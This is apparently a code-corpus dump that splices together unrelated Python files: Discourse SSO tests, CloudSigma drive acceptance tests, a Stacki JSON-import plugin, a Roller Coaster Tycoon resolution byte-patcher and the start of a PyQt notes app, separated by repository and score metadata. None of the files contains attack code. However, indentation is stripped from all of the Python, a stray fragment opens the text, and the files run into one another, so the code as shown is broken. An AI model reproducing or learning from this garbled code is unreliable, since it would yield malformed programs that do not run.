__mod_name__ = 'nith_results'
| 1.015625 | 1 |
tests/test_sso.py | fmarco76/DiscourseSSO | 14 | 12769661 | <filename>tests/test_sso.py
# Copyright 2015 INFN
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SSO Application tests
"""
from flask import url_for
import pytest
from urlparse import urlparse
from werkzeug.exceptions import BadRequest, Forbidden
from discourseSSO import sso
app = sso.app
class Test_sso():
def test_payload_check(self):
"""Test the payload is properly managed and the user is sent to the
authentication page
"""
with app.test_request_context('/sso/login?sso=bm9uY2U9Y2I2ODI1MWVlZm'
'I1MjExZTU4YzAwZmYxMzk1ZjBjMGI%3D%0A&'
'sig=2828aa29899722b35a2f191d34ef9b3ce'
'695e0e6eeec47deb46d588d70c7cb56',
method='GET'):
res = sso.payload_check()
assert res.status_code == 302
assert urlparse(res.location).path == url_for('user_authz')
def test_bad_payload_sig(self):
"""Test the error code 400 is sent if the signature do not match
the payload
"""
with app.test_request_context('/sso/login?sso=bm9uY2U9Y2I2ODI1MWVlZm'
'I1MjExZTU4YzAwZmYxMzk1ZjBjMGI%3D%0A&'
'sig=2828aa29899722b35a2f191d34ef9b3ce'
'695e0e6eeec47deb46d588d70c7cb58',
method='GET'):
with pytest.raises(BadRequest):
sso.payload_check()
def test_no_payload(self):
"""Test the error code 400 is sent if the sso field is not provided"""
with app.test_request_context('/sso/login?sig=2828aa29899722b35a2f191'
'd34ef9b3ce695e0e6eeec47deb46d588d70c7c'
'b56',
method='GET'):
with pytest.raises(BadRequest):
sso.payload_check()
def test_no_hash(self):
"""Test the error code 400 is sent if the sig field is not provided"""
with app.test_request_context('/sso/login?sso=bm9uY2U9Y2I2ODI1MWVlZm'
'I1MjExZTU4YzAwZmYxMzk1ZjBjMGI%3D%0A&',
method='GET'):
with pytest.raises(BadRequest):
sso.payload_check()
def test_authentication_no_shibboleth_attributes(self):
"""Test the authentication when shibboleth do not provide attributes"""
with app.test_request_context('/sso/auth',
method='GET'):
with pytest.raises(Forbidden):
sso.user_authz()
def test_authentication_no_previous_session(self):
"""Test the authentication are properly send to Discourse"""
with app.test_request_context('/sso/auth',
method='GET',
environ_base={
'givenName': 'sam',
'sn': '',
'username': 'samsam',
'mail': '<EMAIL>',
'eppn': 'hello123'}
):
with pytest.raises(Forbidden):
sso.user_authz()
def test_authentication_generation(self):
"""Test the authentication are properly send to Discourse"""
with app.test_request_context('/sso/auth',
method='GET',
environ_base={
'givenName': 'sam',
'sn': '',
'username': 'samsam',
'mail': '<EMAIL>',
'eppn': 'hello123'}
) as req:
req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
resp = sso.user_authz()
assert resp.status_code == 302
# sso and sig are different from the one reported in
# https://meta.discourse.org/t/official-single-sign-on-for-
# discourse/13045
# This because ruby and python include new lines in different
# positions during the base64 encoding (of course they do not
# matter for the base64 but the following URLencoding and
# signature are slightly different)
assert resp.location == ('http://discuss.example.com/session/'
'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
'ZT1zYW0mdXNlcm5hbWU9%0Ac2Ftc2FtJmVt'
'YWlsPXRlc3QlNDB0ZXN0LmNvbSZleHRlcm5'
'hbF9pZD1oZWxsbzEyMyZhZG1pbj1m%0AYWx'
'zZQ%3D%3D%0A&sig=a8ad52d665ddf2d2d5'
'5de5d08d745f46d44a503d0b51b0273dd95'
'e1f2abe1cbd')
def test_authentication_generation_with_full_name(self):
"""Test the authentication are properly send to Discourse"""
with app.test_request_context('/sso/auth',
method='GET',
environ_base={
'givenName': 'sam',
'sn': 'big',
'mail': '<EMAIL>',
'eppn': 'hello123'}
) as req:
req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
resp = sso.user_authz()
assert resp.status_code == 302
assert resp.location == ('http://discuss.example.com/session/'
'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
'ZT1zYW0gYmlnJnVzZXJu%0AYW1lPXNhbWJp'
'Z19iNjQyJmVtYWlsPXRlc3QlNDB0ZXN0LmN'
'vbSZleHRlcm5hbF9pZD1oZWxsbzEy%0AMyZ'
'hZG1pbj1mYWxzZQ%3D%3D%0A&sig=8177ae'
'45c294212a96767cfb2208db867a14fa099'
'0bf7efb2f36dcac41d563e8')
def test_authentication_generation_with_avatar_bio(self):
"""Test the authentication are properly send to Discourse"""
with app.test_request_context('/sso/auth',
method='GET',
environ_base={
'givenName': 'sam',
'sn': '',
'username': 'samsam',
'mail': '<EMAIL>',
'eppn': 'hello123',
'avatar': 'http://myAvatarURL',
'profile': 'http://myProfileURL'}
) as req:
req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
resp = sso.user_authz()
assert resp.status_code == 302
# sso and sig are different from the one reported in
# https://meta.discourse.org/t/official-single-sign-on-for-
# discourse/13045
# This because ruby and python include new lines in different
# positions during the base64 encoding (of course they do not
# matter for the base64 but the following URLencoding and
# signature are slightly different)
assert resp.location == ('http://discuss.example.com/session/'
'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
'ZT1zYW0mdXNlcm5hbWU9%0Ac2Ftc2FtJmVt'
'YWlsPXRlc3QlNDB0ZXN0LmNvbSZleHRlcm5'
'hbF9pZD1oZWxsbzEyMyZhdmF0YXJf%0AdXJ'
'sPWh0dHAlM0EvL215QXZhdGFyVVJMJmJpbz'
'1odHRwJTNBLy9teVByb2ZpbGVVUkwmYWRta'
'W49%0AZmFsc2U%3D%0A&sig=61504842b6a'
'130d0f2d6976de814313a8df539d5e95bd9'
'32d693acbcf0b9df14')
def test_authentication_generation_with_flags(self):
"""Test the authentication are properly send to Discourse"""
with app.test_request_context('/sso/auth',
method='GET',
environ_base={
'givenName': 'sam',
'sn': '',
'username': 'samsam',
'mail': '<EMAIL>',
'eppn': '<EMAIL>',
'avatar': 'http://myAvatarURL',
'profile': 'http://myProfileURL'}
) as req:
req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
resp = sso.user_authz()
assert resp.status_code == 302
# sso and sig are different from the one reported in
# https://meta.discourse.org/t/official-single-sign-on-for-
# discourse/13045
# This because ruby and python include new lines in different
# positions during the base64 encoding (of course they do not
# matter for the base64 but the following URLencoding and
# signature are slightly different)
assert resp.location == ('http://discuss.example.com/session/'
'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
'ZT1zYW0mdXNlcm5hbWU9%0Ac2Ftc2FtJmVt'
'YWlsPXRlc3QlNDB0ZXN0LmNvbSZleHRlcm5'
'hbF9pZD1teS5uYW1lJTQwbXkuaWRw%0AJmF'
'2YXRhcl91cmw9aHR0cCUzQS8vbXlBdmF0YX'
'JVUkwmYmlvPWh0dHAlM0EvL215UHJvZmlsZ'
'VVS%0ATCZhZG1pbj1mYWxzZSZyZXF1aXJlX'
'2FjdGl2YXRpb249ZmFsc2U%3D%0A&sig=26'
'8beaa221824d9c5ec9df3cb85e0655e86e1'
'ba49ce516155f3f2557d7340140')
def test_error_page_403(self):
"""Test the correct error code is propagated"""
with app.test_request_context('/sso/auth',
method='GET',
environ_base={
'givenName': 'sam',
'sn': '',
'username': 'samsam',
'mail': '<EMAIL>',
'eppn': 'hello123'}
):
resp = sso.attribuete_not_provided(None)
assert resp[1] == 403 | 2.578125 | 3 |
src/testing/acceptance/test_drives.py | cloudsigma/pycloudsigma | 13 | 12769662 | from multiprocessing import Process, Queue
import os
import struct
import tempfile
import unittest
import random
from logging import getLogger
from nose.plugins.attrib import attr
from past.builtins import basestring
import cloudsigma.resource as cr
import cloudsigma.errors as errors
from testing.utils import DumpResponse
from testing.acceptance.common import StatefulResourceTestBase
LOG = getLogger(__name__)
@attr('acceptance_test')
class DriveBasicTest(StatefulResourceTestBase):
def setUp(self):
super(DriveBasicTest, self).setUp()
self.client = cr.Drive()
self.dump_response = DumpResponse(clients=[self.client])
@attr('docs_snippets')
def test_drive_cycle(self):
drive_def = {
'name': 'test_drive_1',
'size': 1024000000,
'media': 'disk',
}
with self.dump_response('drive_create_minimal'):
drive = self.client.create(drive_def)
drive_uuid = drive['uuid']
self.assertEqual(drive['status'], 'creating')
self._wait_for_status(drive_uuid, 'unmounted')
with self.dump_response('drive_get_unmounted'):
drive = self.client.get(drive_uuid)
with self.dump_response('drive_update_meta'):
drive['meta'] = {
'meta_key1': 'value',
'meta_key2': 'value\nwith\nnew lines'
}
updated_drive = self.client.update(drive_uuid, drive)
self.assertEqual(drive['meta'], updated_drive['meta'])
with self.dump_response('drive_delete'):
self.client.delete(drive_uuid)
self._wait_deleted(drive_uuid)
@attr('docs_snippets')
def test_drive_resize(self):
DRIVE_CREATE_SIZE = 2 * 1024 ** 3
drive_def = {
'name': 'test_drive_1',
'size': DRIVE_CREATE_SIZE,
'media': 'disk',
}
drive = self.client.create(drive_def)
self.assertEqual(drive['status'], 'creating')
self._wait_for_status(
drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CREATED
)
DRIVE_NEW_SIZE = DRIVE_CREATE_SIZE + 3 * 1024 ** 3
with self.dump_response('drive_resize'):
drive_def['size'] = DRIVE_NEW_SIZE
resizing_drive = self.client.update(drive['uuid'], drive_def)
self.assertEqual(resizing_drive['status'], 'resizing')
self._wait_for_status(resizing_drive['uuid'], 'unmounted')
resized_drive = self.client.get(drive['uuid'])
self.assertEqual(
int(resized_drive['size']),
DRIVE_NEW_SIZE,
'Size mismatch after drive resize'
)
DRIVE_NEW_ODD_SIZE = DRIVE_NEW_SIZE + 1*1024**3 + 7*1024**2 + 3*1024
drive_def['size'] = DRIVE_NEW_ODD_SIZE
resizing_drive = self.client.update(drive['uuid'], drive_def)
self.assertEqual(resizing_drive['status'], 'resizing')
self._wait_for_status(resizing_drive['uuid'], 'unmounted')
ALLOWED_SIZE_ROUNDING = 64 * 1024
resized_drive = self.client.get(drive['uuid'])
self.assertNotEqual(
int(resized_drive['size']),
DRIVE_NEW_SIZE,
'Size of {!r} did not change'.format(drive['uuid'])
)
self.assertLess(
abs(DRIVE_NEW_ODD_SIZE-int(resized_drive['size'])),
ALLOWED_SIZE_ROUNDING,
'New size differs with more than %d bytes, requested size %d '
'bytes, reported size after resize %d bytes' % (
ALLOWED_SIZE_ROUNDING,
DRIVE_NEW_ODD_SIZE,
resized_drive['size']
)
)
self.client.delete(drive['uuid'])
self._wait_deleted(drive['uuid'])
@attr('docs_snippets')
def test_drive_resize_action(self):
DRIVE_CREATE_SIZE = 2 * 1024 ** 3
drive_def = {
'name': 'test_drive_1',
'size': DRIVE_CREATE_SIZE,
'media': 'disk',
}
drive = self.client.create(drive_def)
self._wait_for_status(
drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CREATED
)
drive['size'] = 2 * drive['size']
with self.dump_response('drive_resize_action'):
self.client.resize(drive['uuid'], drive)
self._wait_for_status(
drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CREATED
)
resized_drive = self.client.get(drive['uuid'])
self.assertEqual(resized_drive['size'], drive['size'])
self.client.delete(drive['uuid'])
self._wait_deleted(drive['uuid'])
@attr('docs_snippets')
def test_drive_listing(self):
req = [
{
'name': 'test_drive_%i' % i,
'size': '1024000000',
'media': 'disk',
} for i in range(5)
]
with self.dump_response('drive_create_bulk'):
drives = self.client.create(req)
for drive in drives:
self._wait_for_status(drive['uuid'], 'unmounted')
# Get the short list of fields
with self.dump_response('drive_list'):
self.client.list()
# Get just a list of uuids
with self.dump_response('drive_list_just_uuid_and_status'):
just_uuids = self.client.list(query_params={'fields':'uuid,status'})
for el in just_uuids:
self.assertEqual(set(el.keys()), {'uuid', 'status'})
# Get detailed information on drives
with self.dump_response('drive_list_detail'):
self.client.list_detail()
for drive in drives:
self.client.delete(drive['uuid'])
for drive in drives:
self._wait_deleted(drive['uuid'])
@attr('docs_snippets')
def test_drive_edit(self):
drive_def = {
'name': 'test_drive_x',
'size': 1024000000,
'media': 'disk',
}
drive = self.client.create(drive_def)
self._wait_for_status(drive['uuid'], 'unmounted')
drive_def['name'] = 'test_drive_y'
drive_def['media'] = 'cdrom'
with self.dump_response('drive_edit'):
updated_drive = self.client.update(drive['uuid'], drive_def)
self.assertDictContainsSubset(drive_def, updated_drive)
self.client.delete(updated_drive['uuid'])
self._wait_deleted(updated_drive['uuid'])
@attr('docs_snippets')
def test_drive_clone(self):
drive_def = {
'name': 'test_drive_x',
'size': '1024000000',
'media': 'disk',
}
drive = self.client.create(drive_def)
self._wait_for_status(
drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CLONING
)
clone_drive_def = {
'name': 'test_drive_y',
'media': 'cdrom',
'affinities': [],
}
with self.dump_response('drive_clone'):
cloned_drive = self.client.clone(drive['uuid'], clone_drive_def)
self._wait_for_status(
cloned_drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CLONING
)
self.client.delete(drive['uuid'])
self.client.delete(cloned_drive['uuid'])
self._wait_deleted(cloned_drive['uuid'], timeout=60)
self._wait_deleted(drive['uuid'], timeout=60)
def test_drive_avoid(self):
drive_def = {
'name': 'test_drive_x',
'size': '1024000000',
'media': 'disk',
}
drive = self.client.create(drive_def)
self._wait_for_status(
drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CLONING
)
clone_drive_def = {
'name': 'test_drive_y',
'media': 'cdrom',
'affinities': [],
}
cloned_drive = self.client.clone(
drive['uuid'],
clone_drive_def,
avoid=drive['uuid']
)
another_drive = self.client.create(drive_def, avoid=drive['uuid'])
self._wait_for_status(
cloned_drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CLONING
)
self._wait_for_status(
another_drive['uuid'],
'unmounted',
timeout=self.TIMEOUT_DRIVE_CLONING
)
self.client.delete(drive['uuid'])
self.client.delete(cloned_drive['uuid'])
self.client.delete(another_drive['uuid'])
self._wait_deleted(cloned_drive['uuid'], timeout=60)
self._wait_deleted(drive['uuid'], timeout=60)
self._wait_deleted(another_drive['uuid'], timeout=60)
@attr('docs_snippets')
def test_get_schema(self):
with self.dump_response('drive_schema'):
self.client.get_schema()
@attr('acceptance_test')
class LibraryDriveTest(StatefulResourceTestBase):
def _gen_server_definition(self, drives=[], changed_def={}):
drive_tmp = {
"device": "virtio",
"dev_channel": "0:0",
"drive": None,
"boot_order": 1
}
server_def = {
'name': 'testServerAcc',
'cpu': 1000,
'mem': 512 * 1024 ** 2,
'vnc_password': '<PASSWORD>',
'drives': [],
}
server_def.update(changed_def)
for drive in drives:
if isinstance(drive, dict):
drive = server_def['drives'].append(drive)
elif isinstance(drive, basestring):
guest_drive = drive_tmp.copy()
guest_drive['drive'] = drive
drive = guest_drive
else:
drive = None
if drive is not None:
server_def['drives'].append(drive)
return server_def
def setUp(self):
super(LibraryDriveTest, self).setUp()
self.client = cr.LibDrive()
self.dump_response = DumpResponse(clients=[self.client])
@attr('docs_snippets')
def test_get_schema(self):
with self.dump_response('libdrive_schema'):
self.client.get_schema()
@attr('docs_snippets')
def test_libdrive_listing(self):
with self.dump_response('libdrive_list'):
libdrives = self.client.list(query_params={'limit': 5})
# Select the lib drive with most interesting attributes.
# By default use the first possible
libdrive_uuid = libdrives[0]['uuid']
for d in libdrives:
# pick a drive with licenses
if len(d['licenses']) > 0:
libdrive_uuid = d['uuid']
break
with self.dump_response('libdrive_get'):
libdrive = self.client.get(libdrive_uuid)
dc = cr.Drive()
with DumpResponse(clients=[dc])('librdrive_get_through_drives'):
libdrive_from_drive_url = dc.get(libdrive_uuid)
self.assertIsNone(libdrive_from_drive_url['owner'])
self.assertEqual(libdrive['uuid'], libdrive_from_drive_url['uuid'])
self.assertEqual(libdrive['name'], libdrive_from_drive_url['name'])
def test_attaching_cdrom(self):
server_client = cr.Server()
found = None
for drive in self.client.list():
if drive['media'] == 'cdrom':
found = drive
break
if found is None:
raise unittest.SkipTest(
'Cannot find a cdrom drive in drives library'
)
guest_def = self._gen_server_definition(drives=[found['uuid']])
new_guest = server_client.create(guest_def)
server_client.delete(new_guest['uuid'])
self._wait_deleted(new_guest['uuid'], client=server_client)
def test_attaching_preinstalled(self):
server_client = cr.Server()
found = None
for drive in self.client.list():
if drive['media'] == 'disk':
found = drive
break
if found is None:
raise unittest.SkipTest(
'Cannot find a preinstalled drive in the drives library.'
)
guest_def = self._gen_server_definition(drives=[found['uuid']])
with self.assertRaises(errors.PermissionError):
server_client.create(guest_def)
@attr('stress_test')
class DriveStressTest(StatefulResourceTestBase):
CLONE_COUNT = 20
DRIVE_COUNT = 100
def setUp(self):
super(DriveStressTest, self).setUp()
self.client = cr.Drive()
def _get_min_drive_size(self):
return 1 * 1000 ** 3
def test_create_delete(self):
"""Creating MANY small drives via API to see if it works."""
min_size = self._get_min_drive_size()
define_list = [
{
"name": "test_drive_{}".format(num),
"size": min_size,
"media": "disk",
} for num in range(self.DRIVE_COUNT)
]
res = []
print(f'\nCreating Drives ({self.DRIVE_COUNT})', end='', flush=True)
for i, drive_def in enumerate(define_list):
res.append(self.client.create(drive_def))
print(f' {i + 1}', end='', flush=True)
for creating_drive in res:
self._wait_for_status(
creating_drive['uuid'],
status='unmounted',
client=self.client,
timeout=60
)
print('\nDeleting Drives', end='', flush=True)
for i, drive in enumerate(res):
self.client.delete(drive['uuid'])
print(f' {i + 1}', end='', flush=True)
for deleted_drive in res:
self._wait_deleted(deleted_drive['uuid'], self.client, timeout=60)
def test_clone(self):
"""Clone SOME drives via API to see if it works."""
puuid, ppass = self._get_persistent_image_uuid_and_pass()
cloned = []
print(f'\nCreating Clones ({self.CLONE_COUNT})', end='', flush=True)
for num in range(self.CLONE_COUNT):
cloned.append(
self.client.clone(
puuid,
{'name': "test_atom_clone_{}".format(num)}
)
)
print(f' {num + 1}', end='', flush=True)
for cloning_drive in cloned:
self._wait_for_status(
cloning_drive['uuid'],
status='unmounted',
client=self.client,
timeout=self.TIMEOUT_DRIVE_CLONING
)
print('\nDeleting Clones', end='', flush=True)
for i, drive in enumerate(cloned):
self.client.delete(drive['uuid'])
print(f' {i + 1}', end='', flush=True)
for deleted_drive in cloned:
self._wait_deleted(deleted_drive['uuid'], self.client, timeout=60)
class TestUpload(StatefulResourceTestBase):
def setUp(self):
super(TestUpload, self).setUp()
# 10.something MiB
self.file_size = 10 * 1024 ** 2 + random.randrange(0, 1024)
self.file_path = self.generate_file()
# self.downloaded_path = tempfile.mktemp(prefix='test_download_')
self.dc = cr.Drive()
def tearDown(self):
super(TestUpload, self).tearDown()
os.remove(self.file_path)
# os.remove(self.downloaded_path)
def generate_file(self):
fd, path = tempfile.mkstemp(prefix='drive_upload_test')
os.fdopen(fd).close()
with open(path, 'r+b') as f:
written = 0
# write 64 bit random values
data = struct.pack('=Q', random.randrange(0, 2 ** 64)) * 128 * 4
while written + 1024 * 4 <= self.file_size:
f.write(data)
written += 1024 * 4
# write 8 bit random values until we reach required size
while written < self.file_size:
f.write(chr(random.randrange(0, 2 ** 8)).encode())
written += 1
return path
def test_resumable_upload(self):
from cloudsigma.resumable_upload import Upload
def do_upload(queue):
up = Upload(
self.file_path,
chunk_size=1024 ** 2,
drive_name='test_drive_upload'
)
up.upload()
queue.put((up.drive_uuid, up.uploaded_size))
queue = Queue()
proc = Process(target=do_upload, args=(queue,))
proc.start()
proc.join(2 * 60)
if proc.is_alive():
proc.terminate()
raise Exception('Upload did not finish in time')
uuid, uploaded_size = queue.get(block=False)
LOG.debug('Finished uploading {}'.format(uuid))
self.assertEqual(uploaded_size, os.path.getsize(self.file_path))
drive = self.dc.get(uuid)
self.assertEqual(drive['status'], 'unmounted')
self.dc.delete(uuid)
| 2.046875 | 2 |
common/src/stack/command/stack/commands/load/json/plugin_global.py | shivanshs9/stacki | 0 | 12769663 | <gh_stars>0
# @copyright@
# Copyright (c) 2006 - 2018 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack.commands
import json
from stack.exception import CommandError
class Plugin(stack.commands.Plugin, stack.commands.Command):
notifications = True
def provides(self):
return 'global'
def requires(self):
return [ 'software', 'environment', 'group', 'network', 'appliance', 'os' ]
def run(self, args):
# check if the user would like to import global data
if args and 'global' not in args:
return
# self.owner.data contains the data from the json file defined in init
if 'global' in self.owner.data:
import_data = self.owner.data['global']
else:
self.owner.log.info('no global data in json file')
return
self.notify('\n\tLoading global\n')
for scope in import_data:
# check to make sure the scope is valid
if scope == 'attrs':
for attr in import_data[scope]:
attr_type = attr['type']
if attr_type == 'shadow':
attr_shadow = True
else:
attr_shadow = False
parameters = [
f'attr={attr["attr"]}',
f'value={attr["value"]}',
f'shadow={attr_shadow}',
]
self.owner.try_command('set.attr', parameters, f'setting global attr {attr["attr"]}', 'exists')
elif scope == 'route':
for route in import_data[scope]:
parameters = [
f'address={route["network"]}',
f'gateway={route["gateway"]}',
f'netmask={route["netmask"]}',
]
self.owner.try_command('add.route', parameters, f'adding global route {route["network"]}', 'exists')
elif scope == 'firewall':
for rule in import_data[scope]:
parameters = [
f'action={rule["action"]}',
f'chain={rule["chain"]}',
f'protocol={rule["protocol"]}',
f'service={rule["service"]}',
f'network={rule["network"]}',
f'output-network={rule["output-network"]}',
f'rulename={rule["name"]}',
f'table={rule["table"]}'
]
if rule['flags']:
parameters.append(f'flags={rule["flags"]}')
if rule['comment']:
parameters.append(f'comment={rule["comment"]}')
# if the firewall rule already exists, we want to remove it and add the one in the json
# currently firewall has no set commands
if not self.owner.try_command('add.firewall', parameters, f'adding global firewall fule {rule["name"]}', 'exists'):
self.owner.try_command('remove.firewall', [ f'rulename={rule["name"]}' ], f'removing pre-existing global firewall fule {rule["name"]}', 'exists')
self.owner.try_command('add.firewall', parameters, f'adding global firewall fule {rule["name"]}', 'exists')
elif scope == 'partition':
for partition in import_data[scope]:
parameters = [
f'device={partition["device"]}',
f'partid={partition["partid"]}',
f'size={partition["size"]}',
]
if partition['options']:
parameters.append(f'options={partition["options"]}')
if partition['mountpoint']:
parameters.append(f'mountpoint={partition["mountpoint"]}')
if partition ['fstype']:
parameters.append(f'type={partition["fstype"]}')
self.owner.try_command('add.storage.partition', parameters, f'adding global partition {partition}', 'exists')
elif scope == 'controller':
for controller in import_data[scope]:
parameters = [f'arrayid={controller["arrayid"]}',
f'raidlevel={controller["raidlevel"]}',
f'slot={controller["slot"]}',
]
if controller['adapter']:
parameters.append(controller['adapter'])
if controller['enclosure']:
parameters.append(controller['enclosure'])
if controller['options']:
parameters.append(controller['options'])
self.owner.try_command('add.storage.controller', parameters, f'adding global controller {controller["arrayid"]}', 'exists')
else:
self.owner.log.info(f'error potentially invalid entry in json. {scope} is not a valid global scope')
| 1.992188 | 2 |
rct_full_res/rct_patch.py | jeFF0Falltrades/Tutorials | 24 | 12769664 | # rct_patch.py
#
# Author: jeFF0Falltrades
#
# A patching script for the Roller Coaster Tycoon (1999) game
# executable for play on modern systems at full resolution.
#
# Homepage with Video Tutorial:
# https://github.com/jeFF0Falltrades/Game-Patches/tree/master/rct_full_res
#
# MIT License
#
# Copyright (c) 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from argparse import ArgumentParser, RawTextHelpFormatter
from os.path import isfile
# Dict of both hardcoded and variable values to be checked/patched
PATCHES = {
'FULL_SCREEN': {
# Patches default window function to use full screen mode
'E8 86 7A FF FF': 'E8 33 7A FF FF'
},
'WINDOWED': {
# Patches maximum allowable resolution for windowed mode
'00 05 00 00 0F 8E 07 00 00 00 C7 45 FC 00 05 00 00 81 7D F4 00 04 00 00 0F 8E 07 00 00 00 C7 45 F4 00 04 00 00':
'{wl} {wh} 00 00 0F 8E 07 00 00 00 C7 45 FC {wl} {wh} 00 00 81 7D F4 {hl} {hh} 00 00 0F 8E 07 00 00 00 C7 45 F4 {hl} {hh} 00 00'
}
}
# Gets command line arguments
def getCLAs():
ap = ArgumentParser(
description=
'Roller Coaster Tycoon (1999) Full Resolution Patch by jeFF0Falltrades\n\nHomepage: https://github.com/jeFF0Falltrades/Game-Patches/tree/master/rct_full_res',
formatter_class=RawTextHelpFormatter)
sp = ap.add_subparsers(dest='cmd')
auto = sp.add_parser(
'auto',
help=
'Attempt to patch the program automatically (Patches for full screen mode by default)'
)
auto.add_argument('width', help='Your desired resolution width')
auto.add_argument('height', help='Your desired resolution height')
auto.add_argument(
'-t',
'--target',
default='RCT.exe',
help='Full path to RCT.EXE (defaults to local directory)')
auto.add_argument(
'-o',
'--outfile',
default='rct_patched.exe',
help='Desired output file name (defaults to `rct_patched.exe`)')
auto.add_argument('-w',
'--windowed',
action='store_true',
help='Patch for windowed mode only')
check = sp.add_parser(
'check', help='Check a file for compatibility with auto-patching mode')
check.add_argument(
'-t',
'--target',
default='RCT.exe',
help='Full path to RCT.EXE (defaults to local directory)')
man = sp.add_parser(
'manual',
help=
'Do not patch the file, just show the necessary hex replacements for manual search/replace with a hex editor'
)
man.add_argument('width', help='Your desired resolution width')
man.add_argument('height', help='Your desired resolution height')
return ap.parse_args()
# Populates empty dictionary values based on user input
def populateVals(w, h):
try:
w = int(w)
h = int(h)
except ValueError:
raise SystemExit(
'Invalid width and height values received: {}x{}'.format(
args.width, args.height))
for key in PATCHES['WINDOWED']:
PATCHES['WINDOWED'][key] = PATCHES['WINDOWED'][key].format(
wl=hex(w & 0XFF).replace('0x', '').zfill(2),
wh=hex((w & 0XFF00) >> 8).replace('0x', '').zfill(2),
hl=hex(h & 0XFF).replace('0x', '').zfill(2),
hh=hex((h & 0XFF00) >> 8).replace('0x', '').zfill(2))
# Checks if default values are found in target file
def fileCheck(fp):
data = ''
with open(fp, 'rb') as f:
data = f.read()
for key in PATCHES:
for def_val in PATCHES[key]:
if data.find(bytearray.fromhex(def_val)) == -1:
return False
return True
# Prints hex string replacements for manual patching
def printReplacements():
print('\n{}\n\t--> {}\n\n'.format('Search String', 'Replacement'))
for key in PATCHES:
for k, v in PATCHES[key].items():
print('{}\n\t--> {}\n'.format(k, v))
# Patches for full screen mode
def patchFullScreen(fp, outfile):
data = ''
with open(fp, 'rb') as f:
data = f.read()
for key in PATCHES:
for k, v in PATCHES[key].items():
data = data.replace(bytearray.fromhex(k), bytearray.fromhex(v))
with open(outfile, 'wb') as o:
o.write(data)
# Patches for windowed mode
def patchWindowed(fp, outfile):
data = ''
with open(fp, 'rb') as f:
data = f.read()
for k, v in PATCHES['WINDOWED'].items():
data = data.replace(bytearray.fromhex(k), bytearray.fromhex(v))
with open(outfile, 'wb') as o:
o.write(data)
# Checks if file exists and passes predefined checks
def doFileChecks(fp):
if not isfile(fp):
raise SystemExit(
'Cannot find file {}. Check file path and try again'.format(fp))
if not fileCheck(fp):
raise SystemExit(
'File failed offset check: {}. Use manual mode for replacements or modify patching script.'
.format(fp))
if __name__ == '__main__':
args = getCLAs()
if args.cmd == 'check':
doFileChecks(args.target)
elif args.cmd == 'manual':
populateVals(args.width, args.height)
printReplacements()
elif args.cmd == 'auto':
populateVals(args.width, args.height)
doFileChecks(args.target)
if args.windowed:
patchWindowed(args.target, args.outfile)
else:
patchFullScreen(args.target, args.outfile)
else:
raise SystemExit(
'Unknown command received. Use `python rct_patch.py -h` for help')
print('Success!') | 1.742188 | 2 |
notes.py | Lianaghn/pin | 0 | 12769665 | from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel, QListWidget, QLineEdit, QTextEdit, QInputDialog, QHBoxLayout, QVBoxLayout, QFormLayout
import json
app = QApplication([])
notes = {
"Добро пожаловать!" : {
"текст" : "Это самое лучшее приложение для заметок в мире!",
"теги" : ["добро", "инструкция"]
}
}
with open("notes_data.json", "w") as file:
json.dump(notes, file)
notes_win = QWidget()
notes_win.setWindowTitle('Умные заметки')
notes_win.resize(900, 600)
list_notes = QListWidget()
list_notes_label = QLabel('Список заметок')
button_note_create = QPushButton('Создать заметку')
button_note_del = QPushButton('Удалить заметку')
button_note_save = QPushButton('Сохранить заметку')
field_tag = QLineEdit('')
field_tag.setPlaceholderText('Введите тег...')
field_text = QTextEdit()
button_tag_add = QPushButton('Добавить к заметке')
button_tag_del = QPushButton('Открепить от заметки')
button_tag_search = QPushButton('Искать заметки по тегу')
